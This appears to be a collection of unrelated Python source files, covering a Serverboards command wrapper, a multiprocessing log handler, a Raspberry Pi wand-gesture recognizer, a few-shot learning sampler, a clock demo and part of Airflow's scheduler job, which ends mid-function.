Wrapper around `sh` that integrates into the serverboards loop.
This allows calling external long-running or even blocking programs
while still receiving requests.
Special care must be taken, as it may introduce subtle bugs when using
global state: there are no synchronization mechanisms and the same
function may be called twice (by the remote end).
Not all functionality of `sh` is included, only the most common parts.
"""
def __init__(self):
pass
def __getattr__(self, cmd):
return self.Command(cmd)
def Command(self, cmd):
def caller(*args, **kwargs):
# print("Call %s(%s,%s)" % (cmd, args, kwargs), file=stderr)
def run():
return real_sh.Command(cmd)(*args, **kwargs)
response = rpc.thread_run(run)
# print("SH / %s: %s" % (cmd, repr(response)), file=stderr)
return response
return caller
# An sh-like wrapper to have it integrated into serverboards.
sh = SH()
class RPCWrapper:
"""
Wraps any remote module or function so it can be called directly.
This allows a simple `service.get(uuid)`, given that you previously did a
`service = RPCWrapper("service")`.
There are already some instances ready for importing as:
`from serverboards import service, issues, rules, action`
"""
def __init__(self, module):
self.module = module
def __getattr__(self, sub):
return RPCWrapper(self.module + '.' + sub)
def __call__(self, *args, **kwargs):
if args and kwargs:
return rpc.call(self.module, *args, kwargs)
return rpc.call(self.module, *args, **kwargs)
action = RPCWrapper("action")
auth = RPCWrapper("auth")
group = RPCWrapper("group")
perm = RPCWrapper("perm")
user = RPCWrapper("user")
dashboard = RPCWrapper("dashboard")
event = RPCWrapper("event")
issues = RPCWrapper("issues")
logs = RPCWrapper("logs")
notifications = RPCWrapper("notifications")
plugin = RPCWrapper("plugin")
plugin.component = RPCWrapper("plugin.component")
project = RPCWrapper("project")
rules = RPCWrapper("rules")
rules_v2 = RPCWrapper("rules_v2")
service = RPCWrapper("service")
settings = RPCWrapper("settings")
file = RPCWrapper("file")
|
multiprocessing_log.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Multiprocessing log rotating file handler
# https://mattgathu.github.io/multiprocessing-logging-in-python/
# https://gist.github.com/JesseBuesking/10674086
from logging.handlers import RotatingFileHandler
import multiprocessing
import threading
import logging
import sys
import traceback
class MultiProcessingLog(logging.Handler):
def __init__(self, name, mode, maxsize, rotate):
logging.Handler.__init__(self)
self._handler = RotatingFileHandler(name, mode, maxsize, rotate)
self.queue = multiprocessing.Queue(-1)
t = threading.Thread(target=self.receive)
t.daemon = True
t.start()
def setFormatter(self, fmt):
logging.Handler.setFormatter(self, fmt)
self._handler.setFormatter(fmt)
def receive(self):
while True:
try:
record = self.queue.get()
self._handler.emit(record)
# print('received on pid {}'.format(os.getpid()))
except (KeyboardInterrupt, SystemExit):
raise
except EOFError:
break
except BaseException:
traceback.print_exc(file=sys.stderr)
def send(self, s):
self.queue.put_nowait(s)
def _format_record(self, record):
# ensure that exc_info and args have been stringified. Removes any
# chance of unpickleable things inside and possibly reduces message
# size sent over the pipe
if record.args:
record.msg = record.msg % record.args
record.args = None
if record.exc_info:
dummy = self.format(record)
record.exc_info = None
return record
def emit(self, record):
try:
s = self._format_record(record)
self.send(s)
except (KeyboardInterrupt, SystemExit):
raise
except BaseException:
self.handleError(record)
def close(self):
self._handler.close()
logging.Handler.close(self)
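# Illustrative usage sketch (not part of the original module): attach the
# multiprocessing-safe handler to the root logger and log from forked worker
# processes. The log filename and sizes are assumptions; with the "fork"
# start method the workers inherit the configured root logger.
if __name__ == '__main__':
    def _worker(n):
        # emitted records are queued and written by the parent's receive thread
        logging.getLogger(__name__).info("hello from worker %d", n)

    handler = MultiProcessingLog('example.log', mode='a', maxsize=1024 * 1024, rotate=3)
    handler.setFormatter(logging.Formatter('%(asctime)s %(processName)s %(message)s'))
    root = logging.getLogger()
    root.addHandler(handler)
    root.setLevel(logging.INFO)

    workers = [multiprocessing.Process(target=_worker, args=(i,)) for i in range(3)]
    for w in workers:
        w.start()
    for w in workers:
        w.join()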
|
trained.py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import io
import numpy as np
import argparse
import cv2
from cv2 import *
import picamera
import threading
from threading import Thread
from os import listdir
from os.path import isfile, join, isdir
import sys
import math
import time
import imutils
from imutils.video.pivideostream import PiVideoStream
#######################
# LED light definitions
#######################
from neopixel import *
#from rpi_ws281x.rpi_ws281x import ws
# LED strip configuration:
LED_COUNT = 16 # Number of LED pixels.
LED_PIN = 18 # GPIO pin connected to the pixels (18 uses PWM!).
LED_FREQ_HZ = 800000 # LED signal frequency in hertz (usually 800khz)
LED_DMA = 10 # DMA channel to use for generating signal (try 10)
LED_BRIGHTNESS = 255 # Set to 0 for darkest and 255 for brightest
LED_INVERT = False # True to invert the signal (when using NPN transistor level shift)
LED_CHANNEL = 0 # set to '1' for GPIOs 13, 19, 41, 45 or 53
# LED colors
#Movement: M
#Color: 333a56
m_movement = Color(51, 58, 86)
#Movement: W
#Color: 1b7b34
w_movement = Color(27, 123, 52)
#Movement: L
#Color: e37222
l_movement = Color(227, 114, 34)
#Movement: upside down L
#Color: e52a5f
upside_down_l_movement = Color(229, 42, 95)
#Movement: O
#Color: f7b733
o_movement = Color(247, 183, 51)
#Movement: +
#Color: a239ca
plus_movement = Color(162, 57, 202)
#Movement: S
#Color: 4717f6
s_movement = Color(71, 23, 246)
#Movement: Z
#Color: d7dd35
z_movement = Color(215, 221, 53)
# Create NeoPixel object with appropriate configuration.
global strip
strip = Adafruit_NeoPixel(LED_COUNT, LED_PIN, LED_FREQ_HZ, LED_DMA, LED_INVERT, LED_BRIGHTNESS, LED_CHANNEL)
# Intialize the library (must be called once before other functions).
strip.begin()
print "Initializing point tracking"
parser = argparse.ArgumentParser(description='Cast some spells! Recognize wand motions')
parser.add_argument('--train', help='Causes wand movement images to be stored for training selection.', action="store_true")
parser.add_argument('--circles', help='Use circles to select wand location', action="store_true")
args = parser.parse_args()
print(args.train)
print(args.circles)
# Parameters
lk_params = dict( winSize = (25,25),
maxLevel = 7,
criteria = (cv2.TERM_CRITERIA_EPS | cv2.TERM_CRITERIA_COUNT, 10, 0.03))
blur_params = (4,4)
dilation_params = (5, 5)
movement_threshold = 80
active = False
# start capturing
vs = PiVideoStream().start()
time.sleep(2.0)
run_request = True
frame_holder = vs.read()
frame = None
print "About to start."
knn = None
nameLookup = {}
def TrainOcr() :
global knn, nameLookup
labelNames = []
labelIndexes = []
trainingSet = []
numPics = 0
dirCount = 0
mypath = "./Pictures/"
for d in listdir(mypath):
if isdir(join(mypath, d)):
nameLookup[dirCount] = d
dirCount = dirCount + 1
for f in listdir(join(mypath,d)):
if isfile(join(mypath,d,f)):
labelNames.append(d)
labelIndexes.append(dirCount-1)
trainingSet.append(join(mypath,d,f));
numPics = numPics + 1
print "Training set..."
print trainingSet
print "Labels..."
print labelNames
print "Indexes..."
print labelIndexes
print "Lookup..."
print nameLookup
samples = []
for i in range(0, numPics):
img = cv2.imread(trainingSet[i])
gray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)
samples.append(gray);
npArray = np.array(samples)
shapedArray = npArray.reshape(-1,400).astype(np.float32);
# Initiate kNN, train the data, then test it with test data for k=1
knn = cv2.ml.KNearest_create()
knn.train(shapedArray, cv2.ml.ROW_SAMPLE, np.array(labelIndexes))
lastTrainer = None
def CheckOcr(img):
global knn, nameLookup, args, lastTrainer
size = (20,20)
test_gray = cv2.resize(img,size,interpolation=cv2.INTER_LINEAR)
if args.train and img is not lastTrainer:
cv2.imwrite("Pictures/char" + str(time.time()) + ".png", test_gray)
lastTrainer = img
imgArr = np.array(test_gray).astype(np.float32)
sample = imgArr.reshape(-1,400).astype(np.float32)
ret,result,neighbours,dist = knn.findNearest(sample,k=5)
print ret, result, neighbours, dist
if nameLookup.get(ret) is not None:
print "Match: " + nameLookup[ret]
return nameLookup[ret]
else:
return "error"
def FrameReader():
global frame_holder
t = threading.currentThread()
while getattr(t, "do_run", True):
frame = vs.read()
frame = imutils.resize(frame, width=400)
cv2.flip(frame,1,frame)
frame_holder = frame
time.sleep(.03)
def change_color(strip, color):
"""Wipe color across display a pixel at a time."""
for i in range(strip.numPixels()):
strip.setPixelColor(i, color)
strip.show()
def Spell(spell):
# Invoke IoT (or any other) actions here.
global strip
# NOTE: this early return disables all the spell actions below; remove it
# to enable them.
return
if (spell=="center"):
print "trinket_pin trigger"
elif (spell=="circle"):
print "switch_pin OFF"
print "nox_pin OFF"
print "incendio_pin ON"
change_color(strip, o_movement)
elif (spell=="eight"):
print "switch_pin ON"
print "nox_pin OFF"
print "incendio_pin OFF"
elif (spell=="left"):
print "switch_pin OFF"
print "nox_pin ON"
print "incendio_pin OFF"
elif (spell=="square"):
None
elif (spell=="swish"):
None
elif (spell=="tee"):
None
elif (spell=="triangle"):
None
elif (spell=="zee"):
None
print "CAST: %s" %spell
def GetPoints(image):
if args.circles is not True:
p0 = cv2.goodFeaturesToTrack(image, 5, .01, 30)
else:
p0 = cv2.HoughCircles(image,cv2.HOUGH_GRADIENT,3,50,param1=240,param2=8,minRadius=2,maxRadius=10)
if p0 is not None:
p0.shape = (p0.shape[1], 1, p0.shape[2])
p0 = p0[:,:,0:2]
return p0;
def ProcessImage():
global frame_holder
frame = frame_holder.copy()
frame_gray = cv2.cvtColor(frame,cv2.COLOR_BGR2GRAY)
th, frame_gray = cv2.threshold(frame_gray, 230, 255, cv2.THRESH_BINARY);
return frame_gray, frame
def FindWand():
global old_frame,old_gray,p0,mask, line_mask, run_request
try:
last = time.time()
t = threading.currentThread()
while getattr(t, "do_run", True):
now = time.time()
if run_request:
old_gray, old_frame = ProcessImage()
p0 = GetPoints(old_gray)
if p0 is not None:
mask = np.zeros_like(old_frame)
line_mask = np.zeros_like(old_gray)
run_request = False
last = time.time()
time.sleep(.3)
except cv2.error as e:
None
except:
e = sys.exc_info()[1]
#print "Error: %s" % e
def TrackWand():
global old_frame,old_gray,p0,mask, line_mask, color, frame, active, run_request
print "Starting wand tracking..."
color = (0,0,255)
# Create a mask image for drawing purposes
noPt = 0
while True:
try:
active = False
if p0 is not None:
active = True;
frame_gray, frame = ProcessImage();
cv2.imshow("Original", frame_gray)
# calculate optical flow
newPoints = False
if p0 is not None and len(p0) > 0:
noPt = 0
try:
if old_gray is not None and frame_gray is not None:
p1, st, err = cv2.calcOpticalFlowPyrLK(old_gray, frame_gray, p0, None, **lk_params)
newPoints = True
except cv2.error as e:
None
except:
print "."
continue
else:
noPt = noPt + 1
if noPt > 10:
try:
im2, contours,hierarchy = cv2.findContours(line_mask.copy(),cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_SIMPLE)
cnt = contours[0]
x,y,w,h = cv2.boundingRect(cnt)
crop = line_mask[y-10:y+h+10,x-30:x+w+30]
result = CheckOcr(crop);
cv2.putText(line_mask, result, (0,50), cv2.FONT_HERSHEY_SIMPLEX, 1.0, (255,255,255))
Spell(result)
if line_mask is not None:
cv2.imshow("Raspberry Potter", line_mask)
line_mask = np.zeros_like(line_mask)
print ""
finally:
noPt = 0
run_request = True
if newPoints:
# Select good points
good_new = p1[st==1]
good_old = p0[st==1]
# draw the tracks
for i,(new,old) in enumerate(zip(good_new,good_old)):
a,b = new.ravel()
c,d = old.ravel()
cv2.line(line_mask, (a,b),(c,d),(255,255,255), 10)
if line_mask is not None:
cv2.imshow("Raspberry Potter", line_mask)
else:
if frame is not None:
cv2.imshow("Original", frame)
run_request = True
time.sleep(.3)
# Now update the previous frame and previous points
old_gray = frame_gray.copy()
p0 = good_new.reshape(-1,1,2)
except IndexError:
run_request = True
except cv2.error as e:
None
#print sys.exc_info()
except TypeError as e:
None
print "Type error."
exc_type, exc_obj, exc_tb = sys.exc_info()
print(exc_type, exc_tb.tb_lineno)
except KeyboardInterrupt as e:
raise e
except:
None
#print sys.exc_info()
#print "Tracking Error: %s" % e
key = cv2.waitKey(10)
if key in [27, ord('Q'), ord('q')]: # exit on ESC
cv2.destroyAllWindows()
break
try:
TrainOcr()
t = Thread(target=FrameReader)
t.do_run = True
t.start()
find = Thread(target=FindWand)
find.do_run = True
find.start()
print "START incendio_pin ON and set switch off if video is running"
time.sleep(2)
TrackWand()
except KeyboardInterrupt:
print("Shutting down...")
finally:
t.do_run = False
find.do_run = False
t.join()
find.join()
cv2.destroyAllWindows()
vs.stop()
sys.exit(1)
|
parallel_sampler.py
|
import time
import datetime
from multiprocessing import Process, Queue, cpu_count
import torch
import numpy as np
# from pytorch_transformers import BertModel
from transformers import BertModel
import dataset.utils as utils
import dataset.stats as stats
class ParallelSampler():
def __init__(self, data, args, num_episodes=None, train=False):
self.data = data
self.args = args
self.num_episodes = num_episodes
# So I can change without changing args
self.shot = self.args.shot
self.way = self.args.way
self.all_classes = np.unique(self.data['label'])
self.num_classes = len(self.all_classes)
if self.num_classes < self.args.way:
raise ValueError("Total number of classes is less than #way.")
self.idx_list = []
for y in self.all_classes:
self.idx_list.append(
np.squeeze(np.argwhere(self.data['label'] == y)))
self.count = 0
self.done_queue = Queue()
self.num_cores = cpu_count() if args.n_workers == 0 else args.n_workers
self.p_list = []
for i in range(self.num_cores):
self.p_list.append(
Process(target=self.worker, args=(self.done_queue,)))
for i in range(self.num_cores):
self.p_list[i].start()
# This and next for GCML
def change_shots(self, new_shots):
print(f"Changed shots from {self.shot} to {new_shots}")
self.shot = new_shots
def change_ways(self, new_ways):
print(f"Change ways from {self.way} to {new_ways}")
self.way = new_ways
def get_epoch(self):
for _ in range(self.num_episodes):
# wait until a worker puts an episode onto the queue
support, query = self.done_queue.get()
# convert to torch.tensor
support = utils.to_tensor(support, self.args.cuda, ['raw'])
query = utils.to_tensor(query, self.args.cuda, ['raw'])
if self.args.meta_w_target:
if self.args.meta_target_entropy:
w = stats.get_w_target(
support, self.data['vocab_size'],
self.data['avg_ebd'], self.args.meta_w_target_lam)
else: # use rr approximation (this one is faster)
w = stats.get_w_target_rr(
support, self.data['vocab_size'],
self.data['avg_ebd'], self.args.meta_w_target_lam)
support['w_target'] = w.detach()
query['w_target'] = w.detach()
support['is_support'] = True
query['is_support'] = False
yield support, query
def worker(self, done_queue):
'''
Generate one task (support and query).
Put the sampled (support, query) pair onto the done_queue.
'''
while True:
if done_queue.qsize() > 100:
time.sleep(1)
continue
# sample ways
sampled_classes = np.random.permutation(
self.num_classes)[:self.way]
source_classes = []
for j in range(self.num_classes):
if j not in sampled_classes:
source_classes.append(self.all_classes[j])
source_classes = sorted(source_classes)
# sample examples
support_idx, query_idx = [], []
for y in sampled_classes:
tmp = np.random.permutation(len(self.idx_list[y]))
support_idx.append(
self.idx_list[y][tmp[:self.shot]])
query_idx.append(
self.idx_list[y][
tmp[self.shot:self.shot+self.args.query]])
support_idx = np.concatenate(support_idx)
query_idx = np.concatenate(query_idx)
if self.args.mode == 'finetune' and len(query_idx) == 0:
query_idx = support_idx
# aggregate examples
max_support_len = np.max(self.data['text_len'][support_idx])
max_query_len = np.max(self.data['text_len'][query_idx])
support = utils.select_subset(self.data, {}, ['text', 'text_len', 'label'],
support_idx, max_support_len)
query = utils.select_subset(self.data, {}, ['text', 'text_len', 'label'],
query_idx, max_query_len)
if self.args.embedding in ['idf', 'meta', 'meta_mlp']:
# compute inverse document frequency over the meta-train set
idf = stats.get_idf(self.data, source_classes)
support['idf'] = idf
query['idf'] = idf
if self.args.embedding in ['iwf', 'meta', 'meta_mlp']:
# compute SIF over the meta-train set
iwf = stats.get_iwf(self.data, source_classes)
support['iwf'] = iwf
query['iwf'] = iwf
if 'pos' in self.args.auxiliary:
support = utils.select_subset(
self.data, support, ['head', 'tail'], support_idx)
query = utils.select_subset(
self.data, query, ['head', 'tail'], query_idx)
done_queue.put((support, query))
def __del__(self):
'''
Need to terminate the processes when deleting the object
'''
for i in range(self.num_cores):
self.p_list[i].terminate()
del self.done_queue
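# Illustrative sketch (not part of the original module): drawing one epoch of
# few-shot episodes. `train_data`, `args` and `model` are assumptions and must
# match the structures the class expects (labels, shot/way/query, n_workers).
#
#     sampler = ParallelSampler(train_data, args, num_episodes=100, train=True)
#     for support, query in sampler.get_epoch():
#         loss = model(support, query)   # hypothetical model
#         loss.backward()
#     del sampler                        # terminates the worker processes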
|
7.multiprocessing.py
|
import multiprocessing
import time
def clock(interval):
while True:
print("the time is %s" % time.ctime())
time.sleep(interval)
class ClockProcess(multiprocessing.Process):
def __init__(self, interval):
multiprocessing.Process.__init__(self)
self.interval = interval
def run(self):
while True:
print("The time is %s" % time.ctime())
time.sleep(self.interval)
# if __name__ == '__main__':
# p = ClockProcess(15)
# p.start()
if __name__ == '__main__':
p = multiprocessing.Process(target=clock, args=(15,))
print("starting processing. . . . . .:")
p.start()
print("Non blocking process..")
|
scheduler_job.py
|
# pylint: disable=no-name-in-module
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import datetime
import itertools
import logging
import multiprocessing
import os
import signal
import sys
import threading
import time
from collections import defaultdict
from contextlib import ExitStack, redirect_stderr, redirect_stdout, suppress
from datetime import timedelta
from multiprocessing.connection import Connection as MultiprocessingConnection
from typing import Any, DefaultDict, Dict, Iterable, List, Optional, Set, Tuple
import tenacity
from setproctitle import setproctitle
from sqlalchemy import and_, func, not_, or_
from sqlalchemy.exc import OperationalError
from sqlalchemy.orm import load_only, selectinload
from sqlalchemy.orm.session import Session, make_transient
from airflow import models, settings
from airflow.configuration import conf
from airflow.exceptions import AirflowException, TaskNotFound
from airflow.executors.executor_loader import UNPICKLEABLE_EXECUTORS
from airflow.jobs.base_job import BaseJob
from airflow.models import DAG, DagModel, SlaMiss, errors
from airflow.models.dagbag import DagBag
from airflow.models.dagrun import DagRun
from airflow.models.serialized_dag import SerializedDagModel
from airflow.models.taskinstance import SimpleTaskInstance, TaskInstanceKey
from airflow.stats import Stats
from airflow.ti_deps.dependencies_states import EXECUTION_STATES
from airflow.utils import timezone
from airflow.utils.callback_requests import (
CallbackRequest, DagCallbackRequest, SlaCallbackRequest, TaskCallbackRequest,
)
from airflow.utils.dag_processing import AbstractDagFileProcessorProcess, DagFileProcessorAgent
from airflow.utils.email import get_email_address_list, send_email
from airflow.utils.log.logging_mixin import LoggingMixin, StreamLogWriter, set_context
from airflow.utils.mixins import MultiprocessingStartMethodMixin
from airflow.utils.session import create_session, provide_session
from airflow.utils.sqlalchemy import is_lock_not_available_error, prohibit_commit, skip_locked, with_row_locks
from airflow.utils.state import State
from airflow.utils.types import DagRunType
TI = models.TaskInstance
DR = models.DagRun
DM = models.DagModel
class DagFileProcessorProcess(AbstractDagFileProcessorProcess, LoggingMixin, MultiprocessingStartMethodMixin):
"""Runs DAG processing in a separate process using DagFileProcessor
:param file_path: a Python file containing Airflow DAG definitions
:type file_path: str
:param pickle_dags: whether to serialize the DAG objects to the DB
:type pickle_dags: bool
:param dag_ids: If specified, only look at these DAG ID's
:type dag_ids: List[str]
:param callback_requests: failure callback to execute
:type callback_requests: List[airflow.utils.callback_requests.CallbackRequest]
"""
# Counter that increments every time an instance of this class is created
class_creation_counter = 0
def __init__(
self,
file_path: str,
pickle_dags: bool,
dag_ids: Optional[List[str]],
callback_requests: List[CallbackRequest],
):
super().__init__()
self._file_path = file_path
self._pickle_dags = pickle_dags
self._dag_ids = dag_ids
self._callback_requests = callback_requests
# The process that was launched to process the given file.
self._process: Optional[multiprocessing.process.BaseProcess] = None
# The result of Scheduler.process_file(file_path).
self._result: Optional[Tuple[int, int]] = None
# Whether the process is done running.
self._done = False
# When the process started.
self._start_time: Optional[datetime.datetime] = None
# This ID is used to uniquely name the process / thread that's launched
# by this processor instance
self._instance_id = DagFileProcessorProcess.class_creation_counter
self._parent_channel: Optional[MultiprocessingConnection] = None
DagFileProcessorProcess.class_creation_counter += 1
@property
def file_path(self) -> str:
return self._file_path
@staticmethod
def _run_file_processor(
result_channel: MultiprocessingConnection,
parent_channel: MultiprocessingConnection,
file_path: str,
pickle_dags: bool,
dag_ids: Optional[List[str]],
thread_name: str,
callback_requests: List[CallbackRequest],
) -> None:
"""
Process the given file.
:param result_channel: the connection to use for passing back the result
:type result_channel: multiprocessing.Connection
:param parent_channel: the parent end of the channel to close in the child
:type parent_channel: multiprocessing.Connection
:param file_path: the file to process
:type file_path: str
:param pickle_dags: whether to pickle the DAGs found in the file and
save them to the DB
:type pickle_dags: bool
:param dag_ids: if specified, only examine DAG ID's that are
in this list
:type dag_ids: list[str]
:param thread_name: the name to use for the process that is launched
:type thread_name: str
:param callback_requests: failure callback to execute
:type callback_requests: List[airflow.utils.callback_requests.CallbackRequest]
:return: the process that was launched
:rtype: multiprocessing.Process
"""
# This helper runs in the newly created process
log: logging.Logger = logging.getLogger("airflow.processor")
# Since we share all open FDs from the parent, we need to close the parent side of the pipe here in
# the child, else it won't get closed properly until we exit.
log.info("Closing parent pipe")
parent_channel.close()
del parent_channel
set_context(log, file_path)
setproctitle("airflow scheduler - DagFileProcessor {}".format(file_path))
try:
# redirect stdout/stderr to log
with ExitStack() as exit_stack:
exit_stack.enter_context(redirect_stdout(StreamLogWriter(log, logging.INFO))) # type: ignore
exit_stack.enter_context(redirect_stderr(StreamLogWriter(log, logging.WARN))) # type: ignore
# Re-configure the ORM engine as there are issues with multiple processes
settings.configure_orm()
# Change the thread name to differentiate log lines. This is
# really a separate process, but changing the name of the
# process doesn't work, so changing the thread name instead.
threading.current_thread().name = thread_name
start_time = time.time()
log.info("Started process (PID=%s) to work on %s", os.getpid(), file_path)
dag_file_processor = DagFileProcessor(dag_ids=dag_ids, log=log)
result: Tuple[int, int] = dag_file_processor.process_file(
file_path=file_path,
pickle_dags=pickle_dags,
callback_requests=callback_requests,
)
result_channel.send(result)
end_time = time.time()
log.info(
"Processing %s took %.3f seconds", file_path, end_time - start_time
)
except Exception: # pylint: disable=broad-except
# Log exceptions through the logging framework.
log.exception("Got an exception! Propagating...")
raise
finally:
# We re-initialized the ORM within this Process above so we need to
# tear it down manually here
settings.dispose_orm()
result_channel.close()
def start(self) -> None:
"""Launch the process and start processing the DAG."""
start_method = self._get_multiprocessing_start_method()
context = multiprocessing.get_context(start_method)
_parent_channel, _child_channel = context.Pipe(duplex=False)
process = context.Process(
target=type(self)._run_file_processor,
args=(
_child_channel,
_parent_channel,
self.file_path,
self._pickle_dags,
self._dag_ids,
"DagFileProcessor{}".format(self._instance_id),
self._callback_requests
),
name="DagFileProcessor{}-Process".format(self._instance_id)
)
self._process = process
self._start_time = timezone.utcnow()
process.start()
# Close the child side of the pipe now the subprocess has started -- otherwise this would prevent it
# from closing in some cases
_child_channel.close()
del _child_channel
# Don't store it on self until after we've started the child process - we don't want to keep it from
# getting GCd/closed
self._parent_channel = _parent_channel
def kill(self) -> None:
"""Kill the process launched to process the file, and ensure consistent state."""
if self._process is None:
raise AirflowException("Tried to kill before starting!")
self._kill_process()
def terminate(self, sigkill: bool = False) -> None:
"""
Terminate (and then kill) the process launched to process the file.
:param sigkill: whether to issue a SIGKILL if SIGTERM doesn't work.
:type sigkill: bool
"""
if self._process is None or self._parent_channel is None:
raise AirflowException("Tried to call terminate before starting!")
self._process.terminate()
# Arbitrarily wait 5s for the process to die
with suppress(TimeoutError):
self._process._popen.wait(5) # type: ignore # pylint: disable=protected-access
if sigkill:
self._kill_process()
self._parent_channel.close()
def _kill_process(self) -> None:
if self._process is None:
raise AirflowException("Tried to kill process before starting!")
if self._process.is_alive() and self._process.pid:
self.log.warning("Killing DAGFileProcessorProcess (PID=%d)", self._process.pid)
os.kill(self._process.pid, signal.SIGKILL)
if self._parent_channel:
self._parent_channel.close()
@property
def pid(self) -> int:
"""
:return: the PID of the process launched to process the given file
:rtype: int
"""
if self._process is None or self._process.pid is None:
raise AirflowException("Tried to get PID before starting!")
return self._process.pid
@property
def exit_code(self) -> Optional[int]:
"""
After the process is finished, this can be called to get the return code
:return: the exit code of the process
:rtype: int
"""
if self._process is None:
raise AirflowException("Tried to get exit code before starting!")
if not self._done:
raise AirflowException("Tried to call retcode before process was finished!")
return self._process.exitcode
@property
def done(self) -> bool:
"""
Check if the process launched to process this file is done.
:return: whether the process is finished running
:rtype: bool
"""
if self._process is None or self._parent_channel is None:
raise AirflowException("Tried to see if it's done before starting!")
if self._done:
return True
if self._parent_channel.poll():
try:
self._result = self._parent_channel.recv()
self._done = True
self.log.debug("Waiting for %s", self._process)
self._process.join()
self._parent_channel.close()
return True
except EOFError:
# If we get an EOFError, it means the child end of the pipe has been closed. This only happens
# in the finally block. But due to a possible race condition, the process may have not yet
# terminated (it could be doing cleanup/python shutdown still). So we kill it here after a
# "suitable" timeout.
self._done = True
# Arbitrary timeout -- error/race condition only, so this doesn't need to be tunable.
self._process.join(timeout=5)
if self._process.is_alive():
# Didn't shut down cleanly - kill it
self._kill_process()
if not self._process.is_alive():
self._done = True
self.log.debug("Waiting for %s", self._process)
self._process.join()
self._parent_channel.close()
return True
return False
@property
def result(self) -> Optional[Tuple[int, int]]:
"""
:return: result of running SchedulerJob.process_file()
:rtype: tuple[int, int] or None
"""
if not self.done:
raise AirflowException("Tried to get the result before it's done!")
return self._result
@property
def start_time(self) -> datetime.datetime:
"""
:return: when this started to process the file
:rtype: datetime
"""
if self._start_time is None:
raise AirflowException("Tried to get start time before it started!")
return self._start_time
@property
def waitable_handle(self):
return self._process.sentinel
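# Illustrative sketch (not part of the Airflow source): how a manager might
# drive one of these processors. The argument values are assumptions for the
# example.
#
#     proc = DagFileProcessorProcess(file_path="dags/example.py",
#                                    pickle_dags=False,
#                                    dag_ids=None,
#                                    callback_requests=[])
#     proc.start()
#     while not proc.done:
#         time.sleep(0.1)
#     dag_count, import_error_count = proc.result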
class DagFileProcessor(LoggingMixin):
"""
Process a Python file containing Airflow DAGs.
This includes:
1. Execute the file and look for DAG objects in the namespace.
2. Pickle the DAG and save it to the DB (if necessary).
3. For each DAG, see what tasks should run and create appropriate task
instances in the DB.
4. Record any errors importing the file into ORM
5. Kill (in ORM) any task instances belonging to the DAGs that haven't
issued a heartbeat in a while.
Returns the number of DAGs found in the file and the count of
import errors.
:param dag_ids: If specified, only look at these DAG ID's
:type dag_ids: List[str]
:param log: Logger to save the processing process
:type log: logging.Logger
"""
UNIT_TEST_MODE: bool = conf.getboolean('core', 'UNIT_TEST_MODE')
def __init__(self, dag_ids: Optional[List[str]], log: logging.Logger):
super().__init__()
self.dag_ids = dag_ids
self._log = log
@provide_session
def manage_slas(self, dag: DAG, session: Session = None) -> None:
"""
Find all tasks that have SLAs defined and send alert emails
where needed. New SLA misses are also recorded in the database.
We are assuming that the scheduler runs often, so we only check for
tasks that should have succeeded in the past hour.
"""
if not any(isinstance(ti.sla, timedelta) for ti in dag.tasks):
self.log.info("Skipping SLA check for %s because no tasks in DAG have SLAs", dag)
return
qry = (
session
.query(
TI.task_id,
func.max(TI.execution_date).label('max_ti')
)
.with_hint(TI, 'USE INDEX (PRIMARY)', dialect_name='mysql')
.filter(TI.dag_id == dag.dag_id)
.filter(
or_(
TI.state == State.SUCCESS,
TI.state == State.SKIPPED
)
)
.filter(TI.task_id.in_(dag.task_ids))
.group_by(TI.task_id).subquery('sq')
)
max_tis: List[TI] = session.query(TI).filter(
TI.dag_id == dag.dag_id,
TI.task_id == qry.c.task_id,
TI.execution_date == qry.c.max_ti,
).all()
ts = timezone.utcnow()
for ti in max_tis:
task = dag.get_task(ti.task_id)
if not isinstance(task.sla, timedelta):
continue
dttm = dag.following_schedule(ti.execution_date)
while dttm < timezone.utcnow():
following_schedule = dag.following_schedule(dttm)
if following_schedule + task.sla < timezone.utcnow():
session.merge(SlaMiss(
task_id=ti.task_id,
dag_id=ti.dag_id,
execution_date=dttm,
timestamp=ts))
dttm = dag.following_schedule(dttm)
session.commit()
slas: List[SlaMiss] = (
session
.query(SlaMiss)
.filter(SlaMiss.notification_sent == False, SlaMiss.dag_id == dag.dag_id) # noqa pylint: disable=singleton-comparison
.all()
)
if slas: # pylint: disable=too-many-nested-blocks
sla_dates: List[datetime.datetime] = [sla.execution_date for sla in slas]
fetched_tis: List[TI] = (
session
.query(TI)
.filter(
TI.state != State.SUCCESS,
TI.execution_date.in_(sla_dates),
TI.dag_id == dag.dag_id
).all()
)
blocking_tis: List[TI] = []
for ti in fetched_tis:
if ti.task_id in dag.task_ids:
ti.task = dag.get_task(ti.task_id)
blocking_tis.append(ti)
else:
session.delete(ti)
session.commit()
task_list = "\n".join([
sla.task_id + ' on ' + sla.execution_date.isoformat()
for sla in slas])
blocking_task_list = "\n".join([
ti.task_id + ' on ' + ti.execution_date.isoformat()
for ti in blocking_tis])
# Track whether email or any alert notification sent
# We consider email or the alert callback as notifications
email_sent = False
notification_sent = False
if dag.sla_miss_callback:
# Execute the alert callback
self.log.info('Calling SLA miss callback')
try:
dag.sla_miss_callback(dag, task_list, blocking_task_list, slas,
blocking_tis)
notification_sent = True
except Exception: # pylint: disable=broad-except
self.log.exception("Could not call sla_miss_callback for DAG %s", dag.dag_id)
email_content = f"""\
Here's a list of tasks that missed their SLAs:
<pre><code>{task_list}\n</code></pre>
Blocking tasks:
<pre><code>{blocking_task_list}</code></pre>
"""
tasks_missed_sla = []
for sla in slas:
try:
task = dag.get_task(sla.task_id)
except TaskNotFound:
# task already deleted from DAG, skip it
self.log.warning(
"Task %s doesn't exist in DAG anymore, skipping SLA miss notification.",
sla.task_id)
continue
tasks_missed_sla.append(task)
emails: Set[str] = set()
for task in tasks_missed_sla:
if task.email:
if isinstance(task.email, str):
emails |= set(get_email_address_list(task.email))
elif isinstance(task.email, (list, tuple)):
emails |= set(task.email)
if emails:
try:
send_email(
emails,
